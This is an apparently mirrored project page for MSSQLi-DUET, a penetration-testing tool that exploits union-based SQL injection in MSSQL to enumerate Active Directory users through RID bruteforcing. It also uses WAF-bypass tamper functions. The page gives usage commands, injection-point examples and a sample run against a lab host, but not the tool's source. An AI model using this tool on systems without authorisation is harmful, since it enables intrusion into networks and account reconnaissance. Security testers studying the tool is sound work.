GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Keramas → Mssqli Duet

Keramas / Mssqli Duet

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing

Programming Languages

python
139335 projects - #7 most used programming language

Labels

windowspenetration-testingactive-directorymssqlsql-injectionapplication-securityburp-extensionsburp-plugin

Projects that are alternatives of or similar to Mssqli Duet

Burp Suite Error Message Checks
Burp Suite extension to passively scan for applications revealing server error messages
Stars: ✭ 45 (-45.12%)
Mutual labels:  penetration-testing, burp-extensions, burp-plugin
auth analyzer
Burp Extension for testing authorization issues. Automated request repeating and parameter value extraction on the fly.
Stars: ✭ 77 (-6.1%)
Mutual labels:  application-security, burp-plugin, burp-extensions
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (+97.56%)
Mutual labels:  penetration-testing, burp-extensions, burp-plugin
Burp Suite Software Version Checks
Burp extension to passively scan for applications revealing software version numbers
Stars: ✭ 29 (-64.63%)
Mutual labels:  penetration-testing, burp-extensions, burp-plugin
Tactical Exploitation
Modern tactical exploitation toolkit.
Stars: ✭ 585 (+613.41%)
Mutual labels:  penetration-testing, active-directory
Aes Killer
Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly
Stars: ✭ 446 (+443.9%)
Mutual labels:  burp-extensions, burp-plugin
Recaptcha
reCAPTCHA = REcognize CAPTCHA: A Burp Suite Extender that recognize CAPTCHA and use for intruder payload 自动识别图形验证码并用于burp intruder爆破模块的插件
Stars: ✭ 596 (+626.83%)
Mutual labels:  burp-extensions, burp-plugin
Breaking And Pwning Apps And Servers Aws Azure Training
Course content, lab setup instructions and documentation of our very popular Breaking and Pwning Apps and Servers on AWS and Azure hands on training!
Stars: ✭ 749 (+813.41%)
Mutual labels:  penetration-testing, application-security
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (+365.85%)
Mutual labels:  penetration-testing, active-directory
Knife
A burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅
Stars: ✭ 626 (+663.41%)
Mutual labels:  burp-extensions, burp-plugin
Janusec
Janusec Application Gateway, Provides Fast and Secure Application Delivery. JANUSEC应用网关,提供快速、安全的应用交付。
Stars: ✭ 771 (+840.24%)
Mutual labels:  sql-injection, application-security
Autorize
Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests
Stars: ✭ 406 (+395.12%)
Mutual labels:  application-security, burp-plugin
Sqlinjectionwiki
一个专注于聚合和记录各种SQL注入方法的wiki
Stars: ✭ 402 (+390.24%)
Mutual labels:  mssql, sql-injection
Domain hunter
A Burp Suite Extension that try to find all sub-domain, similar-domain and related-domain of an organization automatically! 基于流量自动收集整个企业或组织的子域名、相似域名、相关域名的burp插件
Stars: ✭ 594 (+624.39%)
Mutual labels:  burp-extensions, burp-plugin
Cerberus
一款功能强大的漏洞扫描器,子域名爆破使用aioDNS,asyncio异步快速扫描,覆盖目标全方位资产进行批量漏洞扫描,中间件信息收集,自动收集ip代理,探测Waf信息时自动使用来保护本机真实Ip,在本机Ip被Waf杀死后,自动切换代理Ip进行扫描,Waf信息收集(国内外100+款waf信息)包括安全狗,云锁,阿里云,云盾,腾讯云等,提供部分已知waf bypass 方案,中间件漏洞检测(Thinkphp,weblogic等 CVE-2018-5955,CVE-2018-12613,CVE-2018-11759等),支持SQL注入, XSS, 命令执行,文件包含, ssrf 漏洞扫描, 支持自定义漏洞邮箱推送功能
Stars: ✭ 389 (+374.39%)
Mutual labels:  penetration-testing, sql-injection
Jackhammer
Jackhammer - One Security vulnerability assessment/management tool to solve all the security team problems.
Stars: ✭ 633 (+671.95%)
Mutual labels:  penetration-testing, application-security
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+960.98%)
Mutual labels:  penetration-testing, active-directory
Hackbar
HackBar plugin for Burpsuite
Stars: ✭ 917 (+1018.29%)
Mutual labels:  burp-extensions, burp-plugin
Androl4b
A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis
Stars: ✭ 908 (+1007.32%)
Mutual labels:  penetration-testing, application-security
Vulnerable Ad
Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab
Stars: ✭ 360 (+339.02%)
Mutual labels:  penetration-testing, active-directory
View All Similar Projects ➔

MSSQLi-DUET - MSSQL Injection-based Domain User Enumeration Tool

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.

Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.

Currently only supports union-based injection at the moment. More samples and test cases are required to fully test tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation it does not work.

Custom tailoring the script and plugin to your needs should not be too difficult as well. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin

After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.

The request will populate in the request window, and only the fields above it need to be filled out. After hitting run the output will be placed in the results output box for easy copy pasting.

Python Script Usage

Script Help

python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
                      RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
                      [-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

optional arguments:
  -h, --help            show this help message and exit
  -i INJECTION, --injection INJECTION
                        Injection point. Provide only the data needed to
                        escape the query.
  -e ENCODING, --encoding ENCODING
                        Type of encoding: unicode, doubleencode, unmagicquotes
  -t TIME_DELAY, --time_delay TIME_DELAY
                        Time delay for requests.
  -rid RID_RANGE, --rid_range RID_RANGE
                        Hypenated range of RIDs to bruteforce. Ex: 1000-1200
  -ssl SSL, --ssl SSL   Add flag for HTTPS
  -p PARAMETER, --parameter PARAMETER
                        Vulnerable parameter
  -proxy PROXY, --proxy PROXY
                        Proxy connection string. Ex: 127.0.0.1:8080
  -o OUTFILE, --outfile OUTFILE
                        Outfile for username enumeration results.
  -r REQUEST_FILE, --request_file REQUEST_FILE
                        Raw request file saved from Burp

Prepare to be enumerated!

How to use

After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the 'copy to file' feature.

Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter and well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but specification for the initial injection needs to be provided. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.

Ex: test' 
    test'))
    test")"

Example

python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[+] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded


[+] Determining the number of columns in the table...
        [!] Number of columns is  3
[+] Determining column type...
        [!] Column type is null
[+] Discovering domain name...
        [+] Domain = NEUTRINO
[+] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-

[+] Enumerating Active Directory via SIDs...

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes

The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.

Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons maybe need to be commented out to ensure proper determination takes place.

Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

References

https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].